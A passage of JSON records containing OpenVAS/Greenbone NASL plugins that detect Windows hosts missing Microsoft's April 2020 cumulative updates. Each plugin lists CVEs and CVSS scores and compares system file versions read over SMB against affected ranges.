\"CVE-2020-0983\",\n \"CVE-2020-0985\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1003\", \"CVE-2020-1004\", \"CVE-2020-1005\",\n \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550929)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550929\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550929\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3629\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3629\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:38", "description": "This host is missing a critical security\n update according to Microsoft KB4550927", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550927)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816828", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816828\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0699\", \"CVE-2020-0784\", \"CVE-2020-0794\",\n \"CVE-2020-0821\", \"CVE-2020-0888\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0937\", \"CVE-2020-0938\",\n \"CVE-2020-0940\", \"CVE-2020-0942\", \"CVE-2020-0944\", \"CVE-2020-0945\",\n \"CVE-2020-0946\", \"CVE-2020-0948\", \"CVE-2020-0949\", \"CVE-2020-0950\",\n \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\", \"CVE-2020-0956\",\n \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\",\n \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\",\n \"CVE-2020-0968\", \"CVE-2020-0969\", \"CVE-2020-0982\", \"CVE-2020-0983\",\n \"CVE-2020-0985\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1001\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\",\n \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\",\n \"CVE-2020-1016\", \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\",\n \"CVE-2020-1029\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550927)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550927\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550927\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1805\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1805\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:38", "description": "This host is missing a critical security\n update according to Microsoft KB4550922", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550922)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0934", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0987", "CVE-2020-0996", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0913", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-0970", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816829", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816829\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0699\", \"CVE-2020-0784\", \"CVE-2020-0794\",\n \"CVE-2020-0821\", \"CVE-2020-0888\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0913\", \"CVE-2020-0934\", \"CVE-2020-0936\",\n \"CVE-2020-0937\", \"CVE-2020-0938\", \"CVE-2020-0940\", \"CVE-2020-0942\",\n \"CVE-2020-0944\", \"CVE-2020-0945\", \"CVE-2020-0946\", \"CVE-2020-0948\",\n \"CVE-2020-0949\", \"CVE-2020-0950\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\",\n \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\",\n \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0969\",\n \"CVE-2020-0970\", \"CVE-2020-0982\", \"CVE-2020-0983\", \"CVE-2020-0985\",\n \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\",\n \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0996\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1001\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\",\n \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\",\n \"CVE-2020-1016\", \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\",\n \"CVE-2020-1029\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550922)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550922\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please\n see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550922\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1424\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1424\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:37", "description": "This host is missing a critical security\n update according to Microsoft KB4549949", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4549949)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0917", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0934", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0987", "CVE-2020-0996", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0913", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-0970", "CVE-2020-0918", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0910", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816825", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816825", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816825\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0699\", \"CVE-2020-0784\", \"CVE-2020-0794\",\n \"CVE-2020-0821\", \"CVE-2020-0888\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0910\", \"CVE-2020-0913\", \"CVE-2020-0917\",\n \"CVE-2020-0918\", \"CVE-2020-0934\", \"CVE-2020-0936\", \"CVE-2020-0937\",\n \"CVE-2020-0938\", \"CVE-2020-0940\", \"CVE-2020-0942\", \"CVE-2020-0944\",\n \"CVE-2020-0945\", \"CVE-2020-0946\", \"CVE-2020-0948\", \"CVE-2020-0949\",\n \"CVE-2020-0950\", \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\",\n \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\",\n \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\",\n \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0969\", \"CVE-2020-0970\",\n \"CVE-2020-0982\", \"CVE-2020-0983\", \"CVE-2020-0985\", \"CVE-2020-0987\",\n \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\", \"CVE-2020-0994\",\n \"CVE-2020-0995\", \"CVE-2020-0996\", \"CVE-2020-0999\", \"CVE-2020-1000\",\n \"CVE-2020-1001\", \"CVE-2020-1003\", \"CVE-2020-1004\", \"CVE-2020-1005\",\n \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1029\",\n \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4549949)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4549949\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1809 for x64-based Systems\n\n - Microsoft Windows Server 2019\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4549949\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Comctl32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"6.10.17763.0\", test_version2:\"6.10.17763.1157\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\\",\n file_version:dllVer, vulnerable_range:\"6.10.17763.0 - 6.10.17763.1157\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4549951", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4549951)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0917", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0934", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0947", "CVE-2020-0987", "CVE-2020-0996", "CVE-2020-0981", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0913", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-0970", "CVE-2020-0918", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0910", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-0939", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816830", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816830\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0699\", \"CVE-2020-0784\", \"CVE-2020-0794\",\n \"CVE-2020-0821\", \"CVE-2020-0888\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0910\", \"CVE-2020-0913\", \"CVE-2020-0917\",\n \"CVE-2020-0918\", \"CVE-2020-0934\", \"CVE-2020-0936\", \"CVE-2020-0937\",\n \"CVE-2020-0938\", \"CVE-2020-0939\", \"CVE-2020-0940\", \"CVE-2020-0942\",\n \"CVE-2020-0944\", \"CVE-2020-0945\", \"CVE-2020-0946\", \"CVE-2020-0947\",\n \"CVE-2020-0948\", \"CVE-2020-0949\", \"CVE-2020-0950\", \"CVE-2020-0952\",\n \"CVE-2020-0953\", \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0958\",\n \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\",\n \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\",\n \"CVE-2020-0969\", \"CVE-2020-0970\", \"CVE-2020-0981\", \"CVE-2020-0982\",\n \"CVE-2020-0983\", 